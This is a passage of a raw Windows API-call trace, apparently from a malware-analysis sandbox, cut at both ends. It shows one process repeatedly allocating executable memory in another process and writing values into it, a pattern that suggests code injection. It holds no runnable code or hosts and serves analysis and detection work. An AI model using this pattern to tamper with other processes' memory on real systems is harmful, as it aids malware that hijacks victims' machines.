ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.279] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.279] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.279] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20023, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.279] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.279] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a130, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.279] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2c, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.279] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c678*, NumberOfBytesToWrite=0x14, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c678*, NumberOfBytesWritten=0x28df88*=0x14) returned 0x0 [0241.279] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.280] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.280] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.280] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.280] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.280] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.281] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.281] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.281] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.281] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.281] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20024, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.281] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.281] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a138, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.282] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x1e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.282] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c68e*, NumberOfBytesToWrite=0x6, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c68e*, NumberOfBytesWritten=0x28df88*=0x6) returned 0x0 [0241.282] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.282] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.282] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.282] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.283] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.283] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.283] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.283] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.283] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.283] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.283] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20016, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.283] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.284] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a140, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.284] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.284] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c696*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c696*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.284] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.284] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.284] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.284] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.285] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.285] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.285] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.285] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.285] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.285] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.285] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.286] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001f, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.286] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.286] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a148, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.286] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.286] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c6a8*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c6a8*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.286] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.286] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.287] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.287] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.287] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.287] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.287] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.287] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.287] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.287] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.288] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.288] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.288] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a150, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.288] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x25, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.288] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c6b8*, NumberOfBytesToWrite=0xd, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c6b8*, NumberOfBytesWritten=0x28df88*=0xd) returned 0x0 [0241.288] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.288] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.288] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.289] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.289] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.289] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.289] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.289] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.289] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.289] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.289] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x2001d, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.289] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.290] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a158, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.290] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2e, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.290] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c6c8*, NumberOfBytesToWrite=0x16, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c6c8*, NumberOfBytesWritten=0x28df88*=0x16) returned 0x0 [0241.290] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.290] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.290] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.290] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.290] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.291] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.291] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.291] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.291] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.291] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.291] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20026, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.291] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.291] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a160, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.291] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x2d, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.292] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c6e0*, NumberOfBytesToWrite=0x15, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c6e0*, NumberOfBytesWritten=0x28df88*=0x15) returned 0x0 [0241.292] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.292] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.292] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.292] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.292] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28de30 | out: Buffer=0x28de78*, NumberOfBytesWritten=0x28de30*=0x48) returned 0x0 [0241.292] NtClearEvent (EventHandle=0x144) returned 0x0 [0241.292] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0241.293] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de40 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de40*=0x48) returned 0x0 [0241.293] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28de68*=0xe0000, RegionSize=0x28de58, FreeType=0x8000) returned 0x0 [0241.293] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de60*=0x1470000, RegionSize=0x28de50, FreeType=0x8000) returned 0x0 [0241.293] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20025, Buffer=0x28e008, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28df58 | out: Buffer=0x28e008*, NumberOfBytesRead=0x28df58*=0x8) returned 0x0 [0241.293] NtFreeVirtualMemory (ProcessHandle=0x12c, BaseAddress=0x28df98*=0x20000, RegionSize=0x28dfa0, FreeType=0x8000) returned 0x0 [0241.293] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x14002a168, Buffer=0x28e280*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e060 | out: Buffer=0x28e280*, NumberOfBytesWritten=0x28e060*=0x8) returned 0x0 [0241.293] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28df78*=0x0, ZeroBits=0x0, RegionSize=0x28dfa8*=0x27, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df78*=0x20000, RegionSize=0x28dfa8*=0x1000) returned 0x0 [0241.293] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20010, Buffer=0x52c6f8*, NumberOfBytesToWrite=0xf, NumberOfBytesWritten=0x28df88 | out: Buffer=0x52c6f8*, NumberOfBytesWritten=0x28df88*=0xf) returned 0x0 [0241.294] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x20000, Buffer=0x28df68*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df80 | out: Buffer=0x28df68*, NumberOfBytesWritten=0x28df80*=0x10) returned 0x0 [0241.294] NtReadVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28de38 | out: Buffer=0x28de78*, NumberOfBytesRead=0x28de38*=0x48) returned 0x0 [0241.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28de28*=0x0, ZeroBits=0x0, RegionSize=0x28de48*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de28*=0x1470000, RegionSize=0x28de48*=0x1000) returned 0x0 [0241.294] NtAllocateVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x28de08*=0x0, ZeroBits=0x0, RegionSize=0x28ddb8*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28de08*=0xe0000, RegionSize=0x28ddb8*=0x1000) returned 0x0 [0241.294] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0xe0000, Buffer=0x1470000*, NumberOfBytesToWrite=0x30, NumberOfBytesWritten=0x28de10 | out: Buffer=0x1470000*, NumberOfBytesWritten=0x28de10*=0x30) returned 0x0 [0241.294] NtWriteVirtualMemory (in: ProcessHandle=0x12c, BaseAddress=0x60000, Buffer=0x28de78*, 